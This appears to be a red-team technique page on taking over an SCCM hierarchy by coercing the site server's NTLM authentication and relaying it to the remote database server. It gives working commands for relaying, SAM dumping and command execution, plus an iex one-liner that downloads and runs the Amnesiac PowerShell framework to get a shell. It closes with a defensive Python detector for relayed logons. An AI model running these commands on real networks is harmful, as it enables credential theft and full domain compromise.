Hierarchy takeover via NTLM coercion and relay to SMB on remote site database


  • PKI certificates are not required for client authentication (default)

  • SCCM database server hosted on a system that is independent of the main site server

  • SMB is reachable and SMB signing isn’t required on the site database server

  • Local Administrator if performing the attack from Windows (due to SMB port redirect)

Tools Required


Divert SMB on port 445 to port 8445 (Requires Local Administrator)

divertTCPconn.exe 445 8445

Set up ntlmrelayx to listen on the alternate SMB port and target the MSSQL database server

# Dump SAM
ntlmrelayx.exe --smb-port 8445 -smb2support -t <MSSQL SCCM IP>

# Execute Commands
ntlmrelayx.exe --smb-port 8445 -smb2support -t <MSSQL SCCM IP> -c "[Command]"

Perform the coercion with SharpEFSTrigger to relay the SCCM Site Server computer account to the MSSQL database server.

SharpEFSTrigger.exe <Site Server IP> <Listener IP>

Getting a full shell on Windows with Amnesiac

Load Amnesiac through PowerShell

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac

Generate a global listener payload with option [2]

Use the payload within ntlmrelayx to be executed on the target system.

# Setup with ntlmrelayx
ntlmrelayx.exe -t <MSSQL SCCM IP> -smb2support --smb-port 8445 -c "[PAYLOAD]"

Once we trigger coercion again, ntlmrelayx will execute the PowerShell payload on the target system. Once this is done, use option [3] on Amnesiac to connect.

Defensive IDs
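
The relay described on this page shows up on the site database server as an NTLM network logon by the site server's computer account from an address that is not the site server's own. The Python below is an added detection example, not part of the original page or of any tool it names; the records are shaped like Windows Security event 4624, and the account name, IP addresses and inventory mapping are constructed assumptions.

```python
import ipaddress

# Assumed inventory (constructed): upper-case computer account -> its own addresses.
KNOWN_HOSTS = {"SCCM-SITE$": {"10.0.10.5"}}

# Constructed records shaped like Security event 4624 on the site database server.
SAMPLE_EVENTS = [
    # Site server reaching its database from its own address: expected.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "SCCM-SITE$", "IpAddress": "10.0.10.5"},
    # Same address logged in IPv4-mapped IPv6 form: still expected.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "sccm-site$", "IpAddress": "::ffff:10.0.10.5"},
    # Site server account arriving from another host's address: relay candidate.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "SCCM-SITE$", "IpAddress": "10.0.20.77"},
    # Kerberos logon: outside the scope of this NTLM rule.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "SCCM-SITE$", "IpAddress": "10.0.20.77"},
]

def normalize_ip(text):
    """Return a comparable address string, unwrapping ::ffff:a.b.c.d, or None."""
    try:
        ip = ipaddress.ip_address(text.strip())
    except ValueError:
        return None
    mapped = getattr(ip, "ipv4_mapped", None)
    return str(mapped or ip)

def relay_candidates(events, known_hosts):
    """Return (account, source) for NTLM network logons by a known computer
    account whose source address is not one of that computer's own."""
    hits = []
    for ev in events:
        account = str(ev.get("TargetUserName", "")).upper()
        if (ev.get("EventID") != 4624 or str(ev.get("LogonType")) != "3"
                or str(ev.get("AuthenticationPackageName", "")).upper() != "NTLM"
                or account not in known_hosts):
            continue
        source = normalize_ip(str(ev.get("IpAddress", "")))
        allowed = {normalize_ip(a) for a in known_hosts[account]}
        # An unparseable source ("-" or empty) cannot be matched, so report it.
        if source is None or source not in allowed:
            hits.append((account, source))
    return hits

if __name__ == "__main__":
    for account, source in relay_candidates(SAMPLE_EVENTS, KNOWN_HOSTS):
        print(f"review: {account} NTLM network logon from {source}")
```

Run it against 4624 events collected from the database server, with the inventory filled from the environment's own asset data.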

